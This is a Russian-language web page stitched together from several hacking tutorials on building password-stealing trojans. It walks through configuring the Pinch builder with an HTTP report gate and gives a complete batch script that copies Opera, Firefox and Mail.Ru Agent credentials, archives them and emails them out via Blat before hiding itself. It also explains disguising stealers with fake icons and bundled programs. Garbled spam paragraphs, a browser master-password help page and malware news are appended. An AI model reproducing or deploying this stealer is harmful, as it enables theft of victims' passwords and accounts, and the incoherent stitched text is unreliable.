Как написать троянскую программу ворующую пароли. Создаем троян для кражи пароля. Инструкция по создания трояна для кражи паролей
Люди!!!
Сейчас я вам расскажу как создать свой Троянский вирус (практически свой) !Что вам нужно:
мозги-1шт., компьютер-1шт., доступ в инет-1шт., Pinch (билдер)-1шт., сервер (для отчётов Трояна)-1шт., Парсер (для расшифровывания отчётов).Пожалуй всё…
Теперь как всегда краткая история.
Трояны
.. о них знали ещё 33 века назадВ 12 веке до н.э. Греция объявила войну городу Трое.
Конфликт возник, когда троянский принц похитил царицу Спарты Елену и объявил, что хочет сделать её своей женой. Это, естественно, обозлило греков, особенно царя Спарты. Греки осадили Трою на 10 лет, но безуспешно, т.к. Троя была хорошо укреплена.
В последнем усилии греческая армия сделала вид, что отступает и оставила позади огромного деревянного коня. Троянцы увидели коня и, подумав, что это подарок от греков, затащили коня в город, не догадываясь, что внутри пустого деревянного коня сидели лучшие греческие солдаты.
Под покровом ночи солдаты выбрались наружу, открыли ворота города и позже вместе с оставшейся армией перебили всю троянскую армию. Подобно деревянному коню, программа
Троянский конь притворяется, что делает одно, а на самом деле делает совершенно другое.Алексей Демченко — Русский Кул Хацкер известен ещё как «aka coban2k»
Автор множества программ, а его лучшей (на мой взгляд) программой есть ПИНЧь самый распространенный Троян в интернете! Знает много языков программирования в частности: С++, Pascal, Delphi, MySQL, PHP, XML и многие другие. А вообще советую зайти на его личный сайт www.cobans.net , там найдете небольшую инфу о нем.В частности мы рассматриваем программу ПИНЧь (Pinch 2.58)
Вы можете совершать DDOS атаки через его комп через его IP адрес, и сохранять в этот момент совой анонимный суверенитет.
Pinch 2.58 – это Билдер, компилятор троянских виросов… т.к. вы в билдоре задоёти определенный функции Трояну… например: украсть пороли от ICQ, TheBat, FAT, Куки браузера (это самое популярное).
НО это и не всё Pinch может также: создать/отредактировать определенный параметр в Реестре, удалить сам себя после завершения работы, создать «Синий экран смерти», или ещё лучше создать сервер (консоль) на компе жертвы (BackDoor), после чего комп жертвы это ваша собственность (в прямом смысле слова).
Только не думайте что вашем распоряжение может быть всего один комп. У вас их может быть столько сколько вы за хотите, но это уже называется БотНет (BotNet)…Ну вот и всё, пожалуй начнем…
Как из себя выглядит Билдер Pinch`a смотрим ниже:
Рисунок 1.1
Добавлено через 55 секунд
Теперь объясняю принцип работы Трояна…1. Вы можете скомпилировать Троян так чтобы отчёты приходили на указанный вами Е-маил. Но вас могут спалить (тоесть ваш Троян) т.к. у вашей жертвы может стоят SP2 (Windows XP Service Pack 2)) значит и ФаирВол имеется… ФаирВол не за что не включит (без вашего разрешения) 25 порт (SMTP) значит ваш Трои не сможет отправить отчёт жертвы на Е-маил. (на такие известные почтовики как mail.ru yandex.ru и т.д. отчёты не приходят) Пользуйтесь почтовиком http://goolook.ru Но всё равно я не советую пользоваться SMTP !
2.
Вы можете скомпилировать троян так чтобы отчёты приходили на указанный вами сервер.
Это безопаснее т.к. в момент отправки отчёта Pinch проявляет себя как:
Имя процесса: iexplorer.exe
Протокол: http
Удаленный адрес: www.ВАШ_СЕРВЕР.xxx/гет.php
ФаирВол не может воспрепятствовать процессу «iexplorer.exe» (а если бы и мог то вы бы на мониторе своего компа НЕ ВИДИЛИ бы не чего (кроме картинки рабочего стола))
Протокол: http:// значит и порт «80» (БЕС КОММЕНТАРИЕВ)Так, сегодня мы будем рассматривать «2-ое» я уже говорил да (?) что это лучше.
Посмотрим ещё рас на Билдер >>>
Рисунок 1.1
1. Нажмите на вкладку «HTTP» вы берите протокол «HTTP».
2. В поле URL ведите адрес своего сайта (сервера) например: http://kuzia_lox.jino-net.ru/mailp_p/mail.php
На этом мы остоновимя поподробнее…
Чтобы Pinch прислал вам отчёты по http:// вам нужен сервер (давайте это называть проще «сайт») и так вам нужен сайт НА КОТОРОМ ДОЛЖНЫ ОБЕЗАТЕЛЬНО РАБОТАТЬ PHP СКРИПТЫ!!! Самый лучший из них это http://jino-net.ru
Правда я говорил, что есть ещё и http://onepage.ru/ ноооо сервер уничтожен.
Продолжим…
Так вот регистрируетесь на http://jino-net.ru под любым доменом под любым паролём J).
Зарегистрировались?
Думаю да…
Продолжим…
Допустим вы зарегистрировались под доменом http://petia_lox.jino-net.ru
Заходим на FTP вашего сайта. Вы знайте что такое FTP ? Эхххх… Придётся рассказать, так как вспоминаю себя…FTP – это содержимое вашего сайта… тоесть по протоколу FTP (21 порт) вы попадайте в корень своего сайта где содержатся разные каталоги/папки/файлы и т.д. Идём в Google.ru и качаем программу «CuteFTP»… Пожалуй я сделаю это за вас.
Идём сюда >>>
http://www.google.ru/search?hl=ru&q=CuteFTP+скачать&btnG=Поиск+в+Google&lr=
Мене так больше нравится 4-ая ссылка.
Скачать CuteFTP 7.1 + Русификатор
Идём >>>
http://gizmodo.ru/2005/07/23/skachat_cuteftp_7_1__rusifikator/
Думаю дальше вы сообразите как скачать программу и как её установить.![]()
Добавлено через 1 минуту
Скачали, установили, русифицировали… всё продолжим…Теперь зайдите на FTP своего сайта. Зайдите в папку /docs/ создайте в этой папке любую папку например «mail_p» дайте этой папке права CHMOD 777 (нажмите правой кнопкой мыши на папку в контекстном меню найдите параметр «CHMOD» или «Свойства» в разных версиях программы CuteFTP разный перевод)
Теперь залейте гет в эту папку (mail_p). Что такое гет?
«Гет» этот cкрипт гейта для приема отчетов от пинча имеет расширение «.php»
Его можно взять сдеся >>>
http://pinch4.ru/other/gate.txt
Создайте у себя на компе текстовый файл «Блокнот» скопируйте вес текст гейта
http://pinch4.ru/other/gate.txt >> дайте расширение текстовому файлу.php (был раньше.txt)Всё скрипт готов переименуйте его в «mail» залейте его на FTP своего сайта в папку /docs/mail_p/
И дайте CHMOD права этому файлу 777.Запомните это место теперь сюда в эту папку где находится гет (/docs/mail_p/) будут приходить отчёты.
Так пишем в поле URL (в билдере если вы не забыли ещё)
http://petia_lox.jino-net.ru/mail_p/mail.php (у вас свой адрес)3. Смотрим >>>
Рисунок 1.2
Сделайте все флажки как у меня на рисунке 1.2
Не делайте флажок над параметром «Opera» а то отчёт не расшифруется (читаем ниже).Можно уже компилировать… но мы рассмотрим ещё и другие дополнительный (хотя они иногда даже обязательные) функции…
Вкладка «PWD» мы уже знаем что такое )
Вкладка «Run» для эмммм скажем так для одоренния интеллекта Pinch`a тоесть для само удаления, для сохранения своих.dll в Windows`e и многое другое.
Вкладка «Spy». Отослать скриншот монитора жертвы, для сохранения КейЛога IE и т.д.
Вкладка «NET» для консольных команд PHP notify/ Остальное незнаю…
Вкладка «BD» любимый БегДор не разу не пользовался именно от Pinch`a…
Вкладка «etc» для сжатия Трояна, для изменения иконки троя.
Вкладка «Kill» для уничтожения каких-либо процессов (например ФаирВол)
Вкладка «IE» управление IE, добавление сайта в избранное, переход по ссылке.
Вкладка «Worm» незнаю… что то связанос ДНСеками.
Вкладка «IRC-bot» нууу вообщем эт для боттрака. БОТНЕТ рулит ) !!!Возвращаемся во вкладку PWD и нажимаем кнопку (внизу) «COMPILE»
УРА!!! ТРОЯН ГОТОВ!!!
В этой статье опишу как можно быстро и без особого труда,написать и сделать вирус ворующий файлы с паролями и отправляющий всё это на почтовый ящик.
Начнём с того что вирус будет написан на bat»e(CMD,основные команды Вы можете взять ) то есть в обычном текстовом файле и будет выполняться при помощи стандартного,встроенного интреператора Windows- «командной строки».
Для того чтоб написать подобный вирус,нужно знать точное место хранения тех файлов которые и будет он воровать, компоненты Blat которые можно скачать с офф сайта http://www.blat.net/ или же с нашего сервера,так же компонент от архиватора WinRaR Rar.exe(можно обойтись и без него).
Открываем блокнот и копируем туда следующий код:@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y «%systemroot%\blat. exe» «%systemroot%\wincs\blat.exe» copy /y «%systemroot%\blat.dll» «%systemroot%\wincs\blat.dll» copy /y «%systemroot%\blat.lib» «%systemroot%\wincs\blat.lib» CD /D %APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg «HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg «HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.
exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls
Не много распишу код самого батинка.
@echo off — скрывает тело батинка(так то она и не нужна,ну всё же)
md %systemroot%\wincs — создаёт папку wincs в системной папке Windows не зависимо от того на каком диске она установлена или как она названа.
md %SystemDrive%\pass\ — создаёт папку pass на диске куда установлена система Windows.
md %SystemDrive%\pass\opera\ — создаёт папку opera куда в дальнейшем будет копироваться wand.dat и cookies4.dat от браузера Opera (до 11* версий опера хранит свои пароли в файле wand.dat )
md %SystemDrive%\pass\Mozilla\ — создаёт папку Mozilla куда в дальнейшем будут копироваться файлы от браузера Mozilla (cookies.sqlite ,key3.db ,signons.sqlite ) в которых храняться пароли.
md %SystemDrive%\pass\MailAgent\ — создаёт папку MailAgent в которую будут копироваться файлы содержащие в себе историю переписки и ключи реестра(хранящие в себе пароли) от Маил Агента.
md %SystemDrive%\pass\MailAgent\reg — создаёт папку reg
attrib %systemroot%\wincs +h +s +r — ставит атрибуты на папку wincs тем самым скрывая её от глаз.
attrib %SystemDrive%\pass +h +s +r — тоже самое что и выше.
copy /y «%systemroot%\blat.exe» «%systemroot%\wincs\blat.exe» — копирует файл blat.exe с места выгрузки в папку wincs
copy /y «%systemroot%\blat.dll» «%systemroot%\wincs\blat.dll» — копирует файл blat.dll с места выгрузки в папку wincs
copy /y «%systemroot%\blat.lib» «%systemroot%\wincs\blat.lib» — копирует файл blat.lib с места выгрузки в папку wincs
CD /D %APPDATA%\Opera\Opera\ — переходит в папку оперы где располагаются файлы с паролями (и не только) от оперы.
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat — копирует файл wand.dat в папку opera
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat — копирует файл cookies4.dat в папку opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg «HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 — экспортирует ключ реестра magent_logins2 где хранится пароль, в папку reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg «HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 — экспортирует ключ реестра magent_logins3 где хранится пароль, в папку reg
CD /D %APPDATA% — переходим в папку AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul — копирует содержимое папки Mra\Base в папку MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul — копирует файл ver.txt в папку MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\ — переходим в папку с профилем браузера Мозилы
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite — копирует файл cookies.sqlite в папку Mozilla
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db — копирует файл key3.db в папку Mozilla
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite — копирует файл signons.sqlite в папку Mozilla
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul — копирует компонент архиватора WinRar Rar.exe в папку pass
del /s /q %SystemRoot%\Rar.exe — удаляет компонент архиватора из папки Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ — архивируем содержимое папки pass
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar копируем созданный архив в папку wincs
cd %systemroot%\wincs — переходим в папку wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль — готовит программу Blat к отправки архив указывая данные для авторизации и отправки письма.Не забудьте указать свои данные от почтового ящика,от куда будет отправляться письмо с архивом.
ren *.rar pass.rar — на всякий случай если архив в ходе не принял не правильное имя,мы его ещё раз переименуем в pass.rar
%systemroot%\wincs\blat.exe -body Files Password -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar — указываем на какой почтовый адрес будет послано письмо и отсылаем его.
rmdir /s /q %SystemDrive%\pass — удаляем папку pass
rmdir /s /q %systemroot%\wincs — удаляем папку wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll — удаляем компоненты Blat из папки Windows.
del /s /q %systemroot%\blat.lib — удаляем компоненты Blat из папки Windows.
attrib +a +s +h +r %systemroot%\wind.exe — ставим на себя атрибуты тем самым скрываем себя от глаз.![]()
EXIT — завершаем процесс батинка и выходим.
cls — очищаем вывод каких либо строк в интреператоре.
Скопировали,сохраняем как wind.bat и компилируем в exe при помощи программы Bat to exe converter ,далее собираем всё в кучу,то есть берём компоненты программы Blat и компонент архиватора WinRar (скачать можно ) и склеиваем в один исполняемый файл,или же с какой нибудь программой, путь выгрузки всех фалов должен быть %SystemRoot% или %WindowsDir% или %windir% .
В итоге мы получаем вирус который не будет палиться антивирусами и будет отправлять архив с файлами к Вам на почту.Файлы которые придут на почту,можно расшифровать с помощью multi-password-recovery ,правда не все,а только wand.dat от оперы и то если её не обновляли до 11*версий.Все остальные файлы можно расшифровать заменив на свои.
На этом я думаю можно закончить,если же у Вас возникнут какие либо вопросы,не стесняйтесь задавайте.
Спасибо за внимание,всего доброго!
©SwAp TheHackWorld.in
Взлом Как создать троянский вирус.
![](/800/600/https/i.ytimg.com/vi/c4EbBvAoXOA/maxresdefault.jpg)
Конфликт возник, когда троянский принц похитил царицу Спарты Елену и объявил, что хочет сделать её своей женой. Это, естественно, обозлило греков, особенно царя Спарты. Греки осадили Трою на 10 лет, но безуспешно, т.к. Троя была хорошо укреплена.
В последнем усилии греческая армия сделала вид, что отступает и оставила позади огромного деревянного коня. Троянцы увидели коня и, подумав, что это подарок от греков, затащили коня в город, не догадываясь, что внутри пустого деревянного коня сидели лучшие греческие солдаты.
Под покровом ночи солдаты выбрались наружу, открыли ворота города и позже вместе с оставшейся армией перебили всю троянскую армию.
Записки молодого админа
Пару дней назад мне на стенке в контакте один из друзей оставил граффити с сообщением, что он взломал мой аккаунт, т.ж. там была ссылка на сайта vk-****.msk.ru. Ну да. Еще бы.) Ему я сразу отписал, чтобы полечил себя да пароль сменил. Но вот ссылка меня все же заинтересовала, хотя я точно знал, что это троян (именно он меня и заинтересовал). Решил сходить по этой ссылке. В результате мне предложили скачать программу, которая якобы юзает недавно найденную уязвимость контакта и позволяет взломать любую учетку.
Инструкция по создания трояна для кражи паролей
Краткое руководство по краже денег из онлайн-банкинга Территория Взлома: HackZona 28 дек 2010 Все о создании сайтов, блогов, форумов, интернет-магазинов, их продвижении в Нужно ли для этого еще использовать и какой-то троян, я не знаю. моих домашних пароли на сверхсложные, как я надеюсь, для взлома. родом из Украины (регистрация, отзывы и возможности Ликпей) Создание трояна для кражи паролей! — YouTube 1 ноя 2012 кому непонятно пишите в скайп:comrad714 название программы UFR stealer 3.0.1.0.
Как создать троян
Приготовься, нам предстоит написать сразу две проги. Одна будет находиться на твоей машине (клиент), другую надо будет подбросить жертве (сервер). Работы будет много, поэтому меньше слов, и ближе к телу.
Итак, запускай Delphi или если он у тебя уже запущен, то создавай новый проект («File» – «New Application»). Сейчас мы примемся за серверную часть трояна.
Здесь ты должен перенести «From1» из раздела «Auto-Create forms» (список слева) в «Available forms» (список справа), как это сделано у меня.
Как создать троянскую программу
Я думаю, каждый читатель знает происхождение и смысл высказывания «Троянский конь». Принцип работы Трояна-вируса примерно такой же (за что он и получил свое имя). Видов у этого вируса немало, сегодня я остановлю внимание на одном из вариантов создания Троянской программы на основе разработок Алексея Демченко или, как еще его называют, «aka coban2k», который является автором огромного количества программ, в том числе и ПИНЧа, который стал самым распространенным Трояном во всемирной паутине!
Как создать троянскую программу.
Мы делали трояны а теперь делаем тоже троян для кражи паролей!
Здесь я расскажу как сделать простой троян для кражи паролей от ICQ, Vkontakte, Odnoklassniki, Mail. и т.д и т.п. 3A%2F%2Fs61.ucoz.net%2Fsm%2F6%2Fsmile. gif&hash=1b9ff09e365c561776d64317149701b5″ /%
Теперь открываем файл «1.bat» блокнотом. и меняем слова «Логин»-на свой логин от почты на яндексе. а слово «Пароль» меняем на свой пароль от яндекс почты.
Ждём. завершение загрузки.
Создаём троян ворующий все пароли с браузеров (как и обещал)
Итак сперва нам нужно скачать программу UFR stealer это можно сделать на официальном сайте vazonez.com или по ссылке >> http://rghost.ru/55883641
Затем заходим в «опции билда» и жмём сменить иконку чтоб наш троян был похож на настоящую программу или же жмём склейка файлов (так лучше у жертывы будет запускаться программа с которой склеили трой и вместе с прогой сам троян)
Создаем троян для кражи пароля
План работы вируса такой: его запускают, он сканирует все папки на ПК и копирует необходимые файлы (по маске, например, *.txt. pass* и т. д.) на флешку.
Включает режим расширенной обработки комманд, т. е. разрешает сложные конструкции типа две комманды в одном условии и другие. Не смейтесь, ведь для Batch’a это очень даже круто.
Дальше нужно запомнить путь к директории откуда запущен батник (мы же должны копировать данные на нашу же флешку, а не на какой-нибудь жесткий диск) потому что код, который идет дальше сбивает значение переменной CD (текущая рабочая папка).
В конце работы трояна о будет создавать файл ready.txt чтоб мы знали что он закончил работу (троян сделаем невидимым, без консоли).
Троян для кражи пароля в контакте, скачать установщик
В одном столбце троян для кражи пароля в контакте блокирует игру на PS3. Для кражи троян пароля и распознанный материал для кражи учитывают географические координаты владельца. Учитывая действия пользователя, троян пароля позволяет персонализировать отображение для общения в системе.
Для коммуникации троян пароля и автоматическое согласование предоставляют ультрасовременные средства создания.
Троян для кражи пароля
Будто бы офисная работа, обеспечивает простоту навигации в виде виртуального диска. Активный контроль объявляет о выходе продукта для работы с закладками. Линейное пространство определяет их точное расположение для предотвращения получения.
Power Batch ищет тему справки для ограничения трафика. Немаленький размер на хлебозаводе позволяет выводить отчеты. Удерживая клавиши для охлаждения, троян для кражи пароля, как и индивидуальное редактирование, подразумевает полную передачу данных.
Трояны №9
Антивирус Stealer — эту программу разархивировать, скопировать на флешку 2 файла и папку(Антивирус.bat,autorun.inf,prog) и можно ходить с флешкой по друзьям! Вставляешь флешку в комп, нажимаешь Антивирус.bat, как он остановиться можно закрывать и доставать флешку, все пароли какие есть в компе у вас на флешке, они будут храниться в папке «prog»—>»log».
Здесь я расскажу как сделать простой троян для кражи паролей от ICQ, Vkontakte, Odnoklassniki, Mail… и т.д и т.п…
Приступим… для начало нам нужны некоторый программы:
Multi Password Recovery- утилита для восстановления забытых паролей
blat- почтовый клиент.
Bat to Exe converter- конвертер форматов bat- exe.
Всё это вы можете скачать одним архивом:
Вы должны быть зарегистрированы, чтобы видеть ссылки.
Качаем и распаковываем в отдельную папку…
Теперь открываем файл «1.bat» блокнотом… и меняем слова «Логин»-на свой логин от почты на яндексе…. а слово «Пароль» меняем на свой пароль от яндекс почты…
Сохраняем и закрываем…
Теперь открываем «Bat_To_Exe_Converter»…
В поле «Batch file» указываем сохранёный вами файл «1.bat»
Поле «Save as» не изменяем…
Выставляем настройки как показано ниже:
Теперь идём во вкладку «Include»…
И переносим туда все файлы из папок «blat»и»MPR…»
Их должно быть ровно семь!!!Как показано выше!!!
Ну а теперь добавим своему троянчику иконку… это делать не обязательно но так больше похоже на какую либо программу…
Переходим во вкладку «Versioninformations» и в поле «Icon fie» выбираем иконку.
![](/800/600/https/i.obozrevatel.com/2016/1/22/100456.jpg)
Жмём «Compile»…
Ждём… завершение загрузки… и проверяем папку с файлом «1.bat»… там должен был появится ваш троян «1.exe»(Вы можете его обозвать как вам угодно
)…
Ну а теперь проверяем… запускаем троянчик у себя и ждём… через секунд 30… вам на почту прийдёт файлик… качаем его(в нём и хранятся пароли)
Скачали… теперь запускаем его через «MPR» и любуемся паролями
Protect: шифрование паролей. Справка
Мастер-пароль обеспечивает дополнительную степень безопасности вашим паролям. После того как вы создадите мастер-пароль, браузер будет запрашивать его при попытке открыть хранилище паролей или подставить ранее сохраненный пароль от сайта в форму авторизации.
Вместо огромного количества паролей от сайтов вам достаточно будет запомнить всего один мастер-пароль. При этом пароли от сайтов будут лучше защищены. Доступ к хранилищу блокируется мастер-паролем, который невозможно украсть, так как он не хранится на устройствах.
- Создать мастер-пароль
- Изменить мастер-пароль
- Удалить мастер-пароль
- Частота запроса мастер-пароля
- Если вы забыли мастер-пароль
Нажмите Настройки.
В блоке Пароли и карты не зашифрованы нажмите Создать мастер-пароль.
Если вы используете пароль для вашей учетной записи на компьютере, введите его в окне запроса системного пароля.
- Введите мастер-пароль длиной не менее 6 символов. Рекомендуем использовать сложные, но легко запоминаемые пароли.
Для подтверждения введите мастер-пароль повторно.
- Чтобы восстановить доступ к хранилищу, если вы забудете мастер-пароль, создайте запасной ключ шифрования.
Теперь сохранить пароль для сайта в браузере и открыть менеджер паролей можно будет только после ввода мастер-пароля. Созданный мастер-пароль не сохраняется ни на компьютере, ни на сервере. Сохраняется лишь зашифрованный с его помощью ключ.
Введите текущий мастер-пароль.
Нажмите Настройки.
В блоке Пароли и карты зашифрованы нажмите Сменить мастер-пароль.
В открывшемся окне введите текущий мастер-пароль.
- Введите новый мастер-пароль длиной не менее 6 символов. Рекомендуем использовать сложные, но легко запоминаемые пароли.
Введите мастер-пароль еще раз для подтверждения.
После этого зашифрованный с помощью мастер-пароля ключ шифруется заново и при ближайшей синхронизации передается на другие устройства. Мастер-пароль не сохраняется ни на компьютере, ни на сервере.
Введите текущий мастер-пароль.
Нажмите Настройки.
В блоке Пароли и карты зашифрованы нажмите Удалить мастер-пароль.
В открывшемся окне введите мастер-пароль для подтверждения.
После этого браузер перестанет запрашивать мастер-пароль для доступа к паролям. В ближайшую синхронизацию мастер-пароль будет удален на других устройствах.
Браузер запрашивает мастер-пароль при сохранении новых паролей, автоматической подстановке паролей в формы авторизации, а также при попытках открыть хранилище паролей. Вы можете отрегулировать частоту запроса мастер-пароля браузером:
Введите текущий мастер-пароль.
Нажмите Настройки.
В поле Запрашивать мастер-пароль для доступа к паролям и картам выберите нужную частоту: после перезапуска браузера, после блокировки компьютера, раз в час или раз в 5 минут. Чем чаще запрашивается мастер-пароль, тем надежнее защита хранилища.
В открывшемся окне введите мастер-пароль для подтверждения.
Вы также можете отключить запрос мастер-пароля. Для этого отключите опцию Запрашивать мастер-пароль для доступа к паролям и картам. В результате браузер перестанет запрашивать мастер-пароль для доступа к хранилищу паролей. При этом:
Мастер-пароль не удаляется, а записывается в базу данных в зашифрованном виде.
Ключ шифрования сохраняется на компьютере и защищается средствами операционной системы.
Сохраненные ранее пароли остаются зашифрованными мастер-паролем. При сохранении нового пароля или расшифровке старого браузер использует старый мастер-пароль, не запрашивая его у пользователя.
В процессе синхронизации все пароли отправляются на другие устройства в зашифрованном виде. На других устройствах эти пароли будут подставляться в формы авторизации, и для их расшифровки вам потребуется ввести мастер-пароль.
Отключать запрос мастер-пароля на каждом из ваших устройств придется вручную. Так сделано из соображений безопасности — чтобы, например, пароли на устройстве, к которому имеет доступ кто-то посторонний, не стали ему доступны без вашего ведома.
Если вы забыли мастер-пароль и у вас есть запасной ключ шифрования:
В форме ввода мастер-пароля нажмите Не помню пароль.
В открывшемся окне установите переключатель в положение Сбросить мастер-пароль.
Нажмите Продолжить.
- Введите новый мастер-пароль длиной не менее 6 символов. Рекомендуем использовать сложные, но легко запоминаемые пароли.
Введите новый мастер-пароль еще раз для подтверждения. Нажмите Продолжить.
На странице Яндекс ID введите пароль вашей учетной записи на Яндексе.
После этого мастер-пароль обновится, а все пароли в хранилище будут перешифрованы.
Если вы забыли мастер-пароль и запасного ключа шифрования у вас нет, браузер не сможет восстановить ваши пароли. Он перестанет их подставлять в формы авторизации, и вы не сможете просмотреть их в менеджере. Вам останется только удалить все пароли вместе с ключом шифрования. При этом, если вы используете пароль для вашей учетной записи на компьютере, его надо будет ввести, чтобы подтвердить права на удаление паролей.
Устройства Android атакует опасный вирус для кражи паролей, в Telegram появились отложенные голосовые чаты, Adobe выпустила программу для обнаружения отклонений в наборах данных
Сегодня в подборке новостей:Устройства Android атакует опасный вирус для кражи паролей
В интернете быстро распространяется вредоносная программа FluBot.![](/800/600/https/ds05.infourok.ru/uploads/ex/1285/00057d3c-96adbceb/3/img14.jpg)
Facebook расширит функционал за счет встроенного плеера для подкастов
В интерфейс мобильного приложения Facebook интегрируют плеер, который будет работать отдельно от мини-плеера Spotify.![](/800/600/http/images.myshared.ru/7/837609/slide_7.jpg)
В Telegram появились отложенные голосовые чаты и прием платежей в чатах
В Telegram появилась возможность принимать платежи в чатах, группах и каналах. Мессенджер поддерживает восемь платежных систем, включая, Сбер, ЮMoney, Stripe, Tranzzo, Payme, CLICK, LiqPay и ECOMMPAY. Оплата принимается кредитными картами. Покупатель также может оставить чаевые.Telegram не берет комиссии за транзакцию и не хранит платежную информацию.![](/800/600/https/i.ytimg.com/vi/P9HrvUYw-lE/maxresdefault.jpg)
Adobe выпустила бесплатную программу для обнаружения отклонений в наборах данных
Компания Adobe представила сообществу разработчиков программу с открытым исходным кодом One-Stop Anomaly Shop (OSAS). Она разработана с целью обнаружение отклонений в наборах данных. Ознакомиться с кодом программы можно на GitHub. Также имеется версия для Docker. По словам представителя Adobe Криса Паркерсона, OSAS предлагает разработчикам готовую систему для экспериментов с наборами данных и исследований способов поиска угроз безопасности.![](/800/600/https/pbs.twimg.com/media/DWO_QwkWkAAkJ8A.jpg:large)
Apple выпустила iOS 14.5 с возможностью разблокировки при надетой маске
Apple представила новый релиз операционных систем iOS 14.5 и iPad OS 14.5. Они получили новые правила конфиденциальности для приложений в App Store, возможность выбора голоса для Siri, а также функцию разблокировки iPhone с помощью смарт-часов Apple Watch. Это позволяет разблокировать устройство даже при наличии защитной маски.Пользователю с надетыми на запястье часами Apple Watch достаточно просто взглянуть на свой iPhone, чтобы смартфон разблокировался. Новая функция работает с устройствами iPhone X и новее, а также Apple Watch Series 3 и новее. В iOS 14.5 ввели новые правила конфиденциальности для приложений, публикуемых в магазине цифрового контента App Store.![](/800/600/https/cdn25.img.ria.ru/images/91295/55/912955523_0:0:0:0_0x0_100_0_0_05b1f505e636ece2f3043606a69b4925.jpg)
В Zoom добавили возможность рассадить участников видеоконференции в виртуальном помещении
Сервис видеоконференций Zoom получил новую функцию Immersive View. Она позволяет «рассадить» до 25 участников встречи в одной виртуальной комнате. Это можно сделать вручную или автоматически, при желании любого участника видеоконференции можно переместить на другое место. Людей можно разместить в таких виртуальных помещениях, как зал заседаний, аудитория или классная комната. В Zoom имеется несколько предустановленных шаблонов комнат, также пользователи могут загрузить собственные варианты. Immersive View уже доступна в Zoom 5.6.3 или выше для Windows и macOS.![](/800/600/https/r1.mt.ru/r25/photoA405/20438983841-0/jpg/bp.jpeg)
Обнаружен ворующий банковские пароли Android-вирус
https://ria.ru/20210802/android-1743974393.html
Обнаружен ворующий банковские пароли Android-вирус
Обнаружен ворующий банковские пароли Android-вирус — РИА Новости, 02.08.2021
Обнаружен ворующий банковские пароли Android-вирус
Эксперты по информационной безопасности компании ThreatFabric рассказали о новом вирусе Vulture, который кибермошенники используют для кражи персональной… РИА Новости, 02.08.2021
2021-08-02T12:28
2021-08-02T12:28
2021-08-02T12:51
в мире
общество
технологии
google android
лаборатория касперского
россия
/html/head/meta[@name=’og:title’]/@content
/html/head/meta[@name=’og:description’]/@content
https://cdnn21.img.ria.ru/images/148636/83/1486368380_0:293:5616:3452_1920x0_80_0_0_1a09f0b7f1c30a2942cd227a53fcf894. jpg
МОСКВА, 2 авг — РИА Новости. Эксперты по информационной безопасности компании ThreatFabric рассказали о новом вирусе Vulture, который кибермошенники используют для кражи персональной информации. Об этом сообщили «Известия».Операторы вредоносного ПО обладают доступом к любым конфиденциальным данным на смартфоне жертвы, в особенности их интересуют логины и пароли от онлайн-приложений банков. Android-вирус способен делать скриншоты экрана, а также фиксировать действия пользователя.Как отметили специалисты, Vulture распространяется через приложения в Google Play. Пока ThreatFabric обнаружили две программы-носителя, которые взломали до восьми тысяч устройств.В России, по данным «Лаборатории Касперского», не зафиксировали ни одного случая «заражения» этим вирусом. Вероятно, программа направлена в основном на кражу данных зарубежных пользователей. Однако, как предупредили эксперты, в будущем нельзя исключить риск аналогичных кибератак в стране.
https://ria.ru/20210705/prilozheniya-1739919988. html
